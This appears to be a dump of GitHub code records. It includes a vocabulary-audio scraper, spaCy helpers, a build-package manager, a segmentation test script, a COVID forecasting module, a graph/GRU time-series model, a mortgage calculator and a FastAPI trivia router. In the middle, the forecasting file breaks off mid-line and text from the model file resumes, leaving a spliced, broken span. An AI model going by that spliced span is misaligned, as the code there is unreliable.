app.config.from_object(settings)","repo_name":"change1q2/pyflask","sub_path":"app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73637170812","text":"from bs4 import BeautifulSoup\nimport requests\nimport urllib.request\nimport re\nimport csv\nfrom pathlib import Path\nimport json\n\n\ndef extractWords():\n print(\"On Words Working...\")\n html_doc = requests.get(URL)\n parser = BeautifulSoup(html_doc.content, 'html.parser')\n cards = parser.find_all(\"div\", {'class': 'side front'})\n words = []\n\n for item in cards:\n ID = re.findall(r\"'(.*?)'\", item['onclick'], re.DOTALL)[0]\n word = item.find(\"td\").string.split(\", \")\n plural = \"\"\n if 1 < len(word): plural = word[1]\n my_obj = {\"ID\": ID, \"word\": word[0], \"plural\": plural}\n words.append(my_obj)\n # print(json.dumps(words, indent = 4) )\n return words\n\n\ndef saveWordOnCSV(list):\n print(\"Words Saved...\")\n\n with open(path + \"/lektion_\" + Lektion + '/words.csv', 'w') as file:\n header = ['Word', 
'English', 'Sentence', 'Plural']\n writer = csv.DictWriter(file, fieldnames=header)\n writer.writeheader()\n for item in list:\n writer.writerow({\n 'Word': item[\"word\"],\n 'English': ' ',\n 'Sentence': ' ',\n 'Plural': item[\"plural\"]\n })\n\n\ndef downloadVoice(list):\n print(\"On Voice Downloading...\")\n\n for item in list:\n file = path + \"/lektion_\" + Lektion + \"/voice/\" + item[\"ID\"] + \".mp3\"\n voice_path = voice_url + item[\"ID\"] + \".mp3\"\n urllib.request.urlretrieve(voice_path, file)\n\n print(\"Voice Saved...\")\n\n\nLevel = input(\"Enter Level Number EX(A1): \")\nLektion = input(\"Enter Lektion Number EX(01): \")\nprint(\"Download Lektion (\" + Lektion + \") of Level (\" + Level + \")\")\n\nURL = 'https://startenwir.com/card' + Level + '_' + Lektion + '.html'\nvoice_url = \"https://startenwir.com/assets/aud/\" + Level.lower(\n) + \"/\" + Lektion + \"/\"\npath = \"./\" + Level\n\nprint(\"Cerate Directories...\")\nPath(path).mkdir(parents=True, exist_ok=True)\nPath(path + \"/lektion_\" + Lektion).mkdir(parents=True, exist_ok=True)\nPath(path + \"/lektion_\" + Lektion + \"/voice\").mkdir(parents=True,\n exist_ok=True)\n\nlist_of_words = extractWords()\nsaveWordOnCSV(list_of_words)\ndownloadVoice(list_of_words)","repo_name":"hosseinmoazami/Web-Scraping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9650697226","text":"import numpy as np\nimport pandas as pd\nimport spacy\nfrom spacy import displacy\nfrom spacy.tokens import Span\n\ndef spans_start(df):\n if len(df)==1:\n return df\n start = df.start.unique()[0]\n end = np.max(df.values)\n return pd.DataFrame([{\"start\":start,\"end\":end}])\n\ndef spans_end(df):\n if len(df)==1:\n return df\n end = df.end.unique()[0]\n start = np.min(df.values)\n return pd.DataFrame([{\"start\":start,\"end\":end}])\n\ndef spanss(df):\n df= df[['start','end']].groupby('start').apply(spans_start)\n df_start=df.reset_index(drop=True)\n df_end = df_start.groupby('end').apply(spans_end).reset_index(drop=True)\n return df_end.reset_index(drop=True)\n\ndef pep_matches_top_1(list_of_matches):\n answers={}\n if type(list_of_matches)!=list:\n list_of_matches = eval(list_of_matches)\n for ans in list_of_matches:\n name = list(ans.keys())[0]\n pep_list = list(ans.values())\n if not pep_list==[{}]:\n pep_name = list(sorted(pep_list[0].items(), key=lambda x: x[1], reverse=True)[0])[0]\n answers.update({name:pep_name})\n return answers\n\nimport re\ndef tmp_fn(df):\n # print(df)\n if type(df)==tuple:\n df=df[1]\n df = df.reset_index()\n text = list(set(df['text'].tolist()))[0]\n lst_ents=[]\n nlp = spacy.blank(\"en\")\n doc = nlp(text)\n options = {\"ents\": [\"PEP\",\"Reason\"], \"colors\": {\"PEP\": \"red\", \"Reason\":\"yellow\"}}\n # options = {\"ents\": [\"PEP\"], \"colors\": {\"PEP\": \"red\"}}\n for i, row in df.iterrows():\n accuse_char = doc.char_span(row['start_why'], row['end_why'])\n if row['pred_ans']=={}:\n continue\n for pep in row['pred_ans']:\n who_char = re.search(pep, text).span()\n who_char=doc.char_span(who_char[0], who_char[1])\n span = Span(doc, who_char.start, who_char.end, \"PEP\")\n reason = Span(doc, accuse_char.start, accuse_char.end, \"Reason\")\n if span not in lst_ents:\n lst_ents.extend([\n span,\n ])\n if reason not in lst_ents:\n lst_ents.extend([\n reason,\n ])\n doc.ents = lst_ents\n \n return 
doc","repo_name":"NaveedShahid/pep-app","sub_path":"helpers/spans.py","file_name":"spans.py","file_ext":"py","file_size_in_byte":2226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35644737504","text":"from typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom FslBuildGen.Config import Config\nfrom FslBuildGen.DataTypes import PackageType\nfrom FslBuildGen.Exceptions import DependencyNotFoundException\nfrom FslBuildGen.Exceptions import InternalErrorException\nfrom FslBuildGen.Exceptions import InvalidDependencyException\nfrom FslBuildGen.Exceptions import UsageErrorException\nfrom FslBuildGen.Packages.Package import Package\nfrom FslBuildGen.Packages.Package import PackageDependency\nfrom FslBuildGen.Packages.PackageProjectContext import PackageProjectContext\nfrom FslBuildGen.Packages.PackageProjectContextBasePackage import PackageProjectContextBasePackage\nfrom FslBuildGen.ProjectId import ProjectId\nfrom FslBuildGen.ToolConfigBasePackage import ToolConfigBasePackage\nfrom FslBuildGen.ToolConfigPackageProjectContextUtil import ToolConfigPackageProjectContextUtil\nfrom FslBuildGen.Xml.XmlGenFile import XmlGenFile\n\n\ndef _AllocatePackage(config: Config, genFile: XmlGenFile, packageProjectContext: PackageProjectContext) -> Package:\n return Package(config, packageProjectContext, genFile)\n\nclass ProjectContextCache(object):\n def __init__(self) -> None:\n super().__init__()\n self.__Cache = dict() # type: Dict[str, PackageProjectContext]\n\n def Add(self, projectContext: PackageProjectContext) -> None:\n self.__Cache[projectContext.ProjectName] = projectContext\n\n def TryGet(self, projectName: str) -> Optional[PackageProjectContext]:\n return self.__Cache[projectName] if projectName in self.__Cache else None\n\nclass PackageManager(object):\n def __init__(self, config: Config, platformName: str, genFiles: List[XmlGenFile]) -> None:\n super().__init__()\n self.__ProjectContextCache = ProjectContextCache()\n self.__PackageFactoryFunction = _AllocatePackage\n uniqueDict = {} # type: Dict[str, Package]\n for genFile in genFiles:\n if not genFile.Name in uniqueDict:\n packageProjectContext = self.__FindProjectContext(config, genFile)\n uniqueDict[genFile.Name] = self.__PackageFactoryFunction(config, genFile, packageProjectContext)\n else:\n raise InternalErrorException(\"Package has been defined multiple times, this ought to have been caught earlier\")\n\n self.OriginalPackageDict = uniqueDict\n self.Packages = list(uniqueDict.values()) # type: List[Package]\n\n # Resolve dependency package names -> actual package objects\n for package in self.Packages:\n self.__ResolvePackageDependencies(platformName, package)\n\n def __FindProjectContext(self, config: Config, genFile: XmlGenFile) -> PackageProjectContext:\n \"\"\"\n Associate the package with the 'project' that it belongs to\n \"\"\"\n if genFile.PackageLocation is None:\n if genFile.Type != PackageType.TopLevel:\n raise UsageErrorException(\"Package '{0}' did not contain a valid location\".format(genFile.Name))\n # The top level package is not associated with a project context\n topLevelProjectContext = PackageProjectContext(ProjectId(\"__TopLevel__\"), \"__TopLevel__\", \"0.0.0.0\", [])\n self.__ProjectContextCache.Add(topLevelProjectContext)\n return topLevelProjectContext\n projectContext = ToolConfigPackageProjectContextUtil.FindProjectContext(config.ToolConfig.ProjectInfo.Contexts, genFile.PackageLocation.ResolvedPath)\n basePackages = 
self.__CreateBasePackageList(projectContext.BasePackages)\n packageProjectContext = self.__ProjectContextCache.TryGet(projectContext.ProjectName)\n if packageProjectContext is None:\n packageProjectContext = PackageProjectContext(projectContext.ProjectId, projectContext.ProjectName, projectContext.ProjectVersion, basePackages)\n self.__ProjectContextCache.Add(packageProjectContext)\n return packageProjectContext\n\n def __CreateBasePackageList(self, basePackages: List[ToolConfigBasePackage]) -> List[PackageProjectContextBasePackage]:\n res = [] # type: List[PackageProjectContextBasePackage]\n for basePackage in basePackages:\n res.append(PackageProjectContextBasePackage(basePackage.Name))\n return res\n\n\n\n def CreatePackage(self, config: Config, platformName: str, genFile: XmlGenFile, insertAtFront: bool = False) -> Package:\n if genFile.Name in self.OriginalPackageDict:\n raise UsageErrorException(\"Package '{0}' already exist\".format(genFile.Name))\n packageProjectContext = self.__FindProjectContext(config, genFile)\n package = self.__PackageFactoryFunction(config, genFile, packageProjectContext)\n self.__ResolvePackageDependencies(platformName, package)\n if not insertAtFront:\n self.Packages.append(package)\n else:\n self.Packages.insert(0, package)\n self.OriginalPackageDict[package.Name] = package\n return package\n\n\n def __ResolvePackageDependencies(self, platformName: str, package: Package) -> None:\n for dep in package.GetDirectDependencies(platformName):\n if not dep.Name in self.OriginalPackageDict:\n raise DependencyNotFoundException(package.Name, dep.Name)\n elif package.Type != PackageType.TopLevel and not self.OriginalPackageDict[dep.Name].AllowDependencyOnThis:\n raise InvalidDependencyException(package.Name, dep.Name)\n else:\n resolvedDep = PackageDependency(self.OriginalPackageDict[dep.Name], dep.Access)\n package.ResolvedDirectDependencies.append(resolvedDep)\n","repo_name":"radiateq/gtec-demo-framework","sub_path":".Config/FslBuildGen/PackageManager.py","file_name":"PackageManager.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"1505465924","text":"import os\nimport argparse\nfrom einops import rearrange\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torch.utils.data import DataLoader, random_split\nimport pytorch_lightning as pl\nfrom pytorch_lightning.metrics.functional import accuracy\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nimport numpy as np\nfrom numpy.random import RandomState\n\nfrom unet import UNet, ThreeDUNet, AttnUNet\nfrom unet.lit_model import LitLambdaUnet\nfrom unet.lit_3D_unet import Lit3DUnet\nfrom unet.trans_unet import VisionTransformer, TRANSCONFIG\nfrom lit_dataset import Stroke_lambda_test\nfrom config import Config\nfrom utils import *\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Train the UNet on images and target masks',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-c', '--cfg', dest='cfg', type=str, default='test',\n help=\"config file.\")\n parser.add_argument('-f', '--fold', dest='fold', type=int, default=0,\n help=\"fold.\")\n parser.add_argument('-v', '--version', dest='version', type=int, default=0,\n help=\"version.\")\n parser.add_argument('-e', '--epoch', dest='epoch', type=int, default=-1,\n help=\"best epoch.\") \n return parser.parse_args()\n\nif __name__ == '__main__':\n args = get_args()\n cfg = Config(args.cfg, 
args.fold, False)\n rs = RandomState(523)\n\n data_dir = os.path.expanduser('~/data/Stroke_AWS_DWI_Anom_PSU/')\n training_cases = 'training_cases.txt'\n\n np.random.seed(cfg.seed) \n torch.manual_seed(cfg.seed)\n\n indx = list(range(32))\n rs.shuffle(indx)\n\n if args.epoch > 0:\n model_name = f'lambdaunet-epoch={args.epoch}'\n else:\n model_name = 'lambdaunet-best'\n\n if args.fold == 0:\n val_indx = indx[:20]\n test_indx = indx[20:]\n elif args.fold == 1:\n val_indx = indx[:10] + indx[20:]\n test_indx = indx[10:20]\n elif args.fold == 2:\n val_indx = indx[10:]\n test_indx = indx[:10]\n else:\n print(\"invalid fold\")\n exit(0)\n\n test_dataset = Stroke_lambda_test(data_dir, training_cases, test_indx, cfg.seq_len)\n \n testloader = DataLoader(test_dataset,\n batch_size=1, shuffle=False, num_workers=0, drop_last=True, pin_memory=True) \n \n if cfg.three_D_Unet:\n net = ThreeDUNet(cfg)\n net = Lit3DUnet.load_from_checkpoint(f'/home/yxo43/results/stroke/LambdaUnet/pl/{args.cfg}/{args.fold}/lightning_logs/version_{args.version}/checkpoints/lambdaunet-best.ckpt', model=net, cfg=cfg, fold=args.fold)\n elif cfg.attn_UNet:\n net = AttnUNet(cfg)\n net = LitLambdaUnet.load_from_checkpoint(f'/home/yxo43/results/stroke/LambdaUnet/pl/{args.cfg}/{args.fold}/lightning_logs/version_{args.version}/checkpoints/lambdaunet-best.ckpt', model=net, cfg=cfg, fold=args.fold)\n elif cfg.trans_Unet is not None:\n trans_config = TRANSCONFIG[cfg.trans_Unet]\n net = VisionTransformer(trans_config, img_size=256, num_classes=1)\n net = LitLambdaUnet.load_from_checkpoint(f'/home/yxo43/results/stroke/LambdaUnet/pl/{args.cfg}/{args.fold}/lightning_logs/version_{args.version}/checkpoints/lambdaunet-best.ckpt', model=net, cfg=cfg, fold=args.fold)\n else:\n net = UNet(cfg)\n net = LitLambdaUnet.load_from_checkpoint(f'/home/yxo43/results/stroke/LambdaUnet/pl/{args.cfg}/{args.fold}/lightning_logs/version_{args.version}/checkpoints/lambdaunet-best.ckpt', model=net, cfg=cfg, fold=args.fold)\n\n trainer = pl.Trainer(gpus=[1], default_root_dir=cfg.test_dir)\n log = trainer.test(net, test_dataloaders=testloader)\n dice = log[0]['test_dice']\n recall = log[0]['test_recall']\n prec = log[0]['test_prec']\n f1 = log[0]['test_f1']\n\n write_metrics_to_csv('results.csv', cfg, args.fold, dice, recall, prec, f1)\n\n # checkpoint = pl_load(checkpoint_path)\n","repo_name":"YanglanOu/LambdaUNet","sub_path":"lit_test.py","file_name":"lit_test.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"78"} +{"seq_id":"36960615565","text":"import numpy as np\nimport time\nimport pandas as pd\nfrom matplotlib import pyplot as plt \n\nfrom benchmark import benchmark \nfrom precomputing import compute_method_depth, precompute_smoothing, precompute_outofsample, minimal_method_depth, repair_increasing\nfrom visualization import plot_last_forecast \nfrom smoothing import simple_mirroring, piecewise_STL\nfrom precompute_smoothing import update_presmoothing_one_country\nfrom test_missing_or_zero import test_poisson \n\nfrom misc_methods import mean_const, linear \nfrom precomputing import precompute_forecasts\nfrom ci import confidence_intervals, convert_quantiles_to_ci, save_ci \n\ndef forecast_one_country(return_dict, country, cumulative_cases, date_, \n methods_, kwargs_list_, names_, \n smoothing_fun,\n datasource, \n H=7, \n type_data = \"cases\",\n missing_var=True,\n return_val = False,\n saveplot=False, newly=False): \n \"\"\"\n main function with methodology for 
single country/region numbers forecasting: \n preprocessing, trend estimation and forecasting\n \n \n Arguments:\n -- return_dict: dictionary for parallelized runs \n -- country: country or region name\n -- cumulative_cases: np array with the cumulative historic observations\n -- date_: list with dates corresponding to cumulative_cases\n -- methods_, kwargs_list_, names_: parameters of the extrapolation methods \n -- smoothing_fun: smoothing function\n -- datasource: name of the datasource, e.g. \"JHU\" \n -- H: forecasting horizon \n -- type_data: type of the data, e.g. \"cases\"\n -- missing_var: whether to check for missing values \n -- return_val: whether to return values, for non-parallel use\n -- saveplot: boolean, whether to save figures with forecast\n -- newly: whether to save trend in smoothing_res\n \n if return_val, function returns the trend, confidence intervals and retrospective trends (used in evaluation)\n \"\"\"\n \n methods_min_depths = [minimal_method_depth(methods_[i], kwargs_list_[i]) for i in range(len(methods_))]\n comment = \"\" \n inc_ = 1 #number of intermediate points for quantile estimation\n history_for_conf_interval = ((inc_+1)*(19)+inc_)+H+3 #length of history used to compute CI\n \n #------------------handling negative values--------------------------------------\n cumulative_cases_ = repair_increasing(cumulative_cases.copy()) \n \n #------------------handling missingness------------------------------------------\n if missing_var:\n cumulative_cases_, date_, flag_nonzero_recent, zeros_missing, zeros_missing_nan = test_poisson(cumulative_cases_, date_) \n else:\n _, _, flag_nonzero_recent, _, _ = test_poisson(cumulative_cases_, date_) \n zeros_missing, zeros_missing_nan = [], [] \n total_days_to_neglect = len(zeros_missing)\n \n \n #------------------treating special cases of delay in reporting-------------------\n if (country in [\"Switzerland\", \"Belgium\"]) or (datasource in [\"OZH\",'BAG_KT']): \n step_back = 1\n if country in [\"Belgium\"]:\n step_back = 3\n if datasource in [\"OZH\",'BAG_KT']:\n step_back = 1\n if (datasource == \"OZH\") and (len(zeros_missing)>step_back):\n step_back=0\n total_days_to_neglect = step_back + len(zeros_missing) \n if (step_back>0): \n date_ = date_[:-step_back]\n zeros_missing = list(np.diff(cumulative_cases_)[-step_back:]) + zeros_missing\n zeros_missing_nan = list(np.diff(cumulative_cases_)[-step_back:]) + zeros_missing_nan\n cumulative_cases_ = cumulative_cases_[:-step_back]\n #--------------------------------------------------------------------------------- \n H_ = H + total_days_to_neglect # forecast on longer horizon in case of missing data\n data_hist = precompute_outofsample(cumulative_cases_)\n start_smoothing = np.max([0,len(cumulative_cases_)-history_for_conf_interval-1])\n \n #--------compute the trend--------------------------------------------------------\n smoothed_hist = update_presmoothing_one_country(\n cumulative_cases_, date_, country, \n smoothing_fun, \n datasource = datasource, newly=newly) \n nnz_recent = np.count_nonzero(np.diff(smoothed_hist[-1][-H:]))\n \n #---------forecasting-------------------------------------------------------------\n \n if (len(cumulative_cases_) > np.min(methods_min_depths) + 2*H) & flag_nonzero_recent &(nnz_recent >= 1): \n # if there is enough data, use the predefined extrapolation-forecasting method\n method_opt, name_opt, kwargs_optimum = methods_[0], names_[0], kwargs_list_[0] \n method_opt_name = method_opt.__name__ \n forecast = method_opt(cumulative_cases_, smoothed_dat=smoothed_hist[-1], **kwargs_optimum, H = H_)[-(H_ + 1):] \n else:\n # not enough data for the country; use the constant trend or zero trend\n comment = \"very few cases (<= 10), unreliable forecast or no change in the data\"\n print(comment)\n if len(smoothed_hist[-1])>H: \n name_opt, method_opt_name, method_opt = \"mean const trend\", mean_const.__name__, mean_const\n kwargs_optimum = {'smooth': True}\n forecast = mean_const(smoothed_hist[-1], smoothed_dat=smoothed_hist[-1], H = H_, **kwargs_optimum)[-(H_ + 1):] \n elif len(smoothed_hist[-1])>0:\n forecast = [smoothed_hist[-1][-1]] * (H_+1)\n else:\n forecast = [0] * (H_+1) \n name_opt, method_opt_name, kwargs_optimum, method_opt = \"no\", \"no\", {}, mean_const\n\n smoothed, date_, sm_concat, date_delta = save_smoothed_df(country,date_,cumulative_cases,smoothed_hist,forecast,H,H_) \n \n #-----------compute confidence intervals limits----------------------------------------------\n ci_full = compute_confidence(cumulative_cases_,cumulative_cases,date_,method_opt, kwargs_optimum, \n smoothing_fun, data_hist,smoothed_hist, country, names_, H,\n saveplot, sm_concat, forecast, name_opt)\n \n #----------------------save data ------------------------------------------------------------ \n opt_method_info = [country, method_opt_name, kwargs_optimum]\n forecast_opt = [country, name_opt, method_opt_name] + list(np.diff(forecast)[-H:]) + date_delta[-H:] + [comment]\n return_dict[country] = [opt_method_info, forecast_opt, smoothed, ci_full] \n if return_val:\n return return_dict, smoothed_hist, ci_full \n \n \ndef compute_confidence(cumulative_cases_,cumulative_cases,date_,\n method_opt, kwargs_optimum, \n smoothing_fun, \n data_hist, smoothed_hist, country, names_, H,\n saveplot,sm_concat,forecast, name_opt, inc_=1):\n \"\"\"\n compute confidence intervals \n \"\"\"\n ci_full = [] \n history_for_conf_interval = (inc_+1)*(20)+H+2\n if (len(cumulative_cases_)>20+H+3) and (len(cumulative_cases_) threshold).nonzero().t()\n # edge_weight = adj[offset, row, col]\n row += offset * n_feature\n col += offset * n_feature\n edge_index = torch.stack([row, col], dim=0)\n x_gnn = x.contiguous().view(batch_size * n_feature, len_feature) # the length was changed here\n batch = torch.arange(0, batch_size).view(-1, 1).repeat(1, n_feature).view(-1).to('cuda:0')\n\n x_gnn = F.relu(self.graph_conv1(x_gnn, edge_index))\n x_gnn, edge_index, _, batch, _, _ = self.graph_pool1(x_gnn, edge_index, None, batch)\n x_gnn_1 = torch.cat([gmp(x_gnn, batch), gep(x_gnn, batch)], dim=1)\n\n x_gnn = F.relu(self.graph_conv2(x_gnn, edge_index))\n x_gnn, edge_index, _, batch, _, _ = self.graph_pool2(x_gnn, edge_index, None, batch)\n x_gnn_2 = torch.cat([gmp(x_gnn, batch), gep(x_gnn, batch)], dim=1)\n\n x_gnn = F.relu(self.graph_conv3(x_gnn, edge_index))\n x_gnn, edge_index, _, batch, _, _ = self.graph_pool3(x_gnn, edge_index, None, batch)\n x_gnn_3 = torch.cat([gmp(x_gnn, batch), gep(x_gnn, batch)], dim=1)\n\n # (Batch, 2 * hidden)\n x_gnn = x_gnn_1 + x_gnn_2 + x_gnn_3\n\n ### newly added\n\n # GRU branch\n\n x_gru = self.gru(x)[0]\n x_gru = x_gru.mean(1)\n x_gru = x_gru.view(N, -1)\n\n # Convolutional Network\n # input ts: # N * C * L\n\n # for i in range(len(self.conv_1_models)):\n 
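# single convolutional path over all input channels; the grouped per-index variant above is commented out\n 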
smoothed_dat=smoothed_hist[-1], **kwargs_optimum, H = H_)[-(H_ + 1):] \n else:\n # not enough data for country use the constant trend or zero trend\n comment = \"very few cases (<= 10), unreliable forecast or no change in the data\"\n print(comment)\n if len(smoothed_hist[-1])>H: \n name_opt, method_opt_name, method_opt = \"mean const trend\", mean_const.__name__, mean_const\n kwargs_optimum = {'smooth': True}\n forecast = mean_const(smoothed_hist[-1], smoothed_dat=smoothed_hist[-1], H = H_, **kwargs_optimum)[-(H_ + 1):] \n elif len(smoothed_hist[-1])>0:\n forecast = [smoothed_hist[-1][-1]] * (H_+1)\n else:\n forecast = [0] * (H_+1) \n name_opt, method_opt_name, kwargs_optimum, method_opt = \"no\", \"no\", {}, mean_const\n\n smoothed, date_, sm_concat, date_delta = save_smoothed_df(country,date_,cumulative_cases,smoothed_hist,forecast,H,H_) \n \n #-----------compute confidence intervals limits----------------------------------------------\n ci_full = compute_confidence(cumulative_cases_,cumulative_cases,date_,method_opt, kwargs_optimum, \n smoothing_fun, data_hist,smoothed_hist, country, names_, H,\n saveplot, sm_concat, forecast, name_opt)\n \n #----------------------save data ------------------------------------------------------------ \n opt_method_info = [country, method_opt_name, kwargs_optimum]\n forecast_opt = [country, name_opt, method_opt_name] + list(np.diff(forecast)[-H:]) + date_delta[-H:] + [comment]\n return_dict[country] = [opt_method_info, forecast_opt, smoothed, ci_full] \n if return_val:\n return return_dict, smoothed_hist, ci_full \n \n \ndef compute_confidence(cumulative_cases_,cumulative_cases,date_,\n method_opt, kwargs_optimum, \n smoothing_fun, \n data_hist, smoothed_hist, country, names_, H,\n saveplot,sm_concat,forecast, name_opt, inc_=1):\n \"\"\"\n compute confidence intervals \n \"\"\"\n ci_full = [] \n history_for_conf_interval = (inc_+1)*(20)+H+2\n if (len(cumulative_cases_)>20+H+3) and (len(cumulative_cases_) threshold).nonzero().t()\n # edge_weight = adj[offset, row, col]\n row += offset * n_feature\n col += offset * n_feature\n edge_index = torch.stack([row, col], dim=0)\n x_gnn = x.contiguous().view(batch_size * n_feature, len_feature) # 这里改动了长度\n batch = torch.arange(0, batch_size).view(-1, 1).repeat(1, n_feature).view(-1).to('cuda:0')\n\n x_gnn = F.relu(self.graph_conv1(x_gnn, edge_index))\n x_gnn, edge_index, _, batch, _, _ = self.graph_pool1(x_gnn, edge_index, None, batch)\n x_gnn_1 = torch.cat([gmp(x_gnn, batch), gep(x_gnn, batch)], dim=1)\n\n x_gnn = F.relu(self.graph_conv2(x_gnn, edge_index))\n x_gnn, edge_index, _, batch, _, _ = self.graph_pool2(x_gnn, edge_index, None, batch)\n x_gnn_2 = torch.cat([gmp(x_gnn, batch), gep(x_gnn, batch)], dim=1)\n\n x_gnn = F.relu(self.graph_conv3(x_gnn, edge_index))\n x_gnn, edge_index, _, batch, _, _ = self.graph_pool3(x_gnn, edge_index, None, batch)\n x_gnn_3 = torch.cat([gmp(x_gnn, batch), gep(x_gnn, batch)], dim=1)\n\n # (Batch, 2 * hidden)\n x_gnn = x_gnn_1 + x_gnn_2 + x_gnn_3\n\n ### 新增\n\n # LSTM\n\n x_gru = self.gru(x)[0]\n x_gru = x_gru.mean(1)\n x_gru = x_gru.view(N, -1)\n\n # Covolutional Network\n # input ts: # N * C * L\n\n # for i in range(len(self.conv_1_models)):\n x_conv = x\n # x_conv = self.conv_1_models[i](x[:, self.idx[i], :])\n x_conv = self.conv_1(x_conv)\n # x_conv = self.SE1(x_conv)\n # x_conv = self.conv_bn_1(x_conv)\n # x_conv = F.leaky_relu(x_conv)\n\n x_conv = self.conv_2(x_conv)\n # x_conv = self.SE2(x_conv)\n # x_conv = self.conv_bn_2(x_conv)\n # x_conv = F.leaky_relu(x_conv)\n\n 
x_conv = self.conv_3(x_conv)\n # x_conv = self.conv_bn_3(x_conv)\n # x_conv = F.leaky_relu(x_conv)\n\n x_conv = torch.mean(x_conv, 2)\n\n # if i == 0:\n # x_conv_sum = x_conv\n # else:\n # x_conv_sum = torch.cat([x_conv_sum, x_conv], dim=1)\n #\n # x_conv = x_conv_sum\n\n x = torch.cat([x_conv, x_gru], dim=1)\n\n # linear mapping to low-dimensional space\n x = torch.cat((x, x_gnn), 1)\n x = self.mapping(x)\n\n # generate the class protocol with dimension C * D (nclass * dim)\n proto_list = []\n for i in range(self.nclass):\n idx = (labels[idx_train].squeeze() == i).nonzero().squeeze(1)\n if self.use_att:\n A = self.att_models[i](x[idx_train][idx]) # N_k * 1\n A = torch.transpose(A, 1, 0) # 1 * N_k\n A = F.softmax(A, dim=1) # softmax over N_k\n\n class_repr = torch.mm(A, x[idx_train][idx]) # 1 * L\n class_repr = torch.transpose(class_repr, 1, 0) # L * 1\n else: # if do not use attention, simply use the mean of training samples with the same labels.\n class_repr = x[idx_train][idx].mean(0) # L * 1\n proto_list.append(class_repr.view(1, -1))\n x_proto = torch.cat(proto_list, dim=0)\n\n # prototype distance\n proto_dists = euclidean_dist(x_proto, x_proto)\n proto_dists = torch.exp(-0.5*proto_dists)\n num_proto_pairs = int(self.nclass * (self.nclass - 1) / 2)\n proto_dist = torch.sum(proto_dists) / num_proto_pairs\n\n dists = euclidean_dist(x, x_proto)\n\n # dump_embedding(x_proto, x, labels)\n return torch.exp(-0.5*dists), proto_dist\n","repo_name":"WenweiGu/TSNet","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27163848012","text":"from modules.DebtCalculation import DebtCalculation\n\nprint(\"Liberate yourself from your mortgage\\n\")\n# try:\n# debt = float(input(\"What is the total debt?\\n\"))\n# remaining_months = int(input(\"How many months are remaining in your term?\\n\"))\n# monthly_payment = float(input(\"What is your obligatory monthly payment?\\n\"))\n# avg_annual_interest_rate = float(input(\"What's the average APR % of the entire term?\\n\"))/100\n# monthly_overpayment = float(input(\"What's your average monthly overpayment?\\n\"))\n# except Exception as e:\n# print(e)\n# exit()\n\ndebtCalc = DebtCalculation(990000.0, 15*12, 580.0, 0.03, 1200.0)\n\ndef formatGbp(f):\n #print(\"f is:{}\".format(f))\n f = round(f, 2)\n if (f<0):\n return \"-£{}\".format(abs(f))\n else:\n return \"£{}\".format(f)\n\ndef yearsAndMonth(monthIndex):\n years = int((monthIndex+1)/12)\n month_of_year = (monthIndex+1)-years*12\n return years, month_of_year\n\ndef reportWithinRemainingMonths():\n for i in range(debtCalc.remaining_months):\n years, month_of_year = yearsAndMonth(i)\n debtCalc.calculate()\n if (i%12==0):\n print(\"---\\nYear\", years, \"\\n---\\n\")\n print(\"Month\", i+1)\n print(\"Debt payment this month:{}\".format(formatGbp(debtCalc.monthly_debt_payment)))\n print(\"Capital paid:{}\".format(formatGbp(debtCalc.capital_paid)))\n if (debtCalc.debt > 0):\n print(\"Remaining debt:{}\\n\".format(formatGbp(debtCalc.debt)))\n else:\n print(\"\\nYou're done after {} years and {} months. With {} to spare!\\n\".format(years, month_of_year, abs(round(debtCalc.debt, 2))))\n exit()\n\ndef reportIfOverExpectedMonths():\n extra_months = 0\n while(debtCalc.debt > 0):\n debtCalc.calculate()\n extra_months += 1\n if (extra_months == debtCalc.remaining_months+100):\n print(\"Calculation limit reached [{}]. 
Your outstanding debt is still {}\".format(extra_months, formatGbp(debtCalc.debt)))\n exit()\n print(\"You needed an extra {} month(s) to clear your debt\".format(extra_months))\n\n\nif __name__== \"__main__\":\n reportWithinRemainingMonths()\n reportIfOverExpectedMonths()\n","repo_name":"LintCroft/debt-liberator","sub_path":"liberate-mortgage.py","file_name":"liberate-mortgage.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70572548412","text":"from app import schemas, db_services, outer_services\nfrom app.database import get_db\nfrom sqlalchemy.orm import Session\nfrom fastapi import Depends, APIRouter\n\nrouter = APIRouter()\n\n\nasync def get_another_and_create(database):\n while True:\n try:\n another_questions = await outer_services.jservice_request(1)\n db_services.create_question(\n schemas.QuestionSchema(question=another_questions[0][\"question\"],\n answer=another_questions[0][\"answer\"]),\n database\n )\n break\n except:\n pass\n\n@router.post('/')\nasync def add_questions(data: schemas.RequestDataSchema = None, database: Session = Depends(get_db)):\n data_to_return = db_services.get_last_question(database)\n if not data_to_return:\n returned_question = {}\n else:\n returned_question = schemas.QuestionSchema(\n id=data_to_return.id,\n question=data_to_return.question,\n answer=data_to_return.answer,\n created_at=data_to_return.created_at\n )\n questions = await outer_services.jservice_request(data.questions_num)\n for question in questions:\n try:\n create_data = schemas.QuestionSchema(question=question[\"question\"], answer=question[\"answer\"])\n db_services.create_question(create_data, database)\n except:\n await get_another_and_create(database)\n return returned_question\n\n\n\n@router.get('/')\nasync def get_question(question_id: int = None, database: Session = Depends(get_db)):\n data = db_services.get_question(question_id, database)\n if data:\n return data\n else:\n return 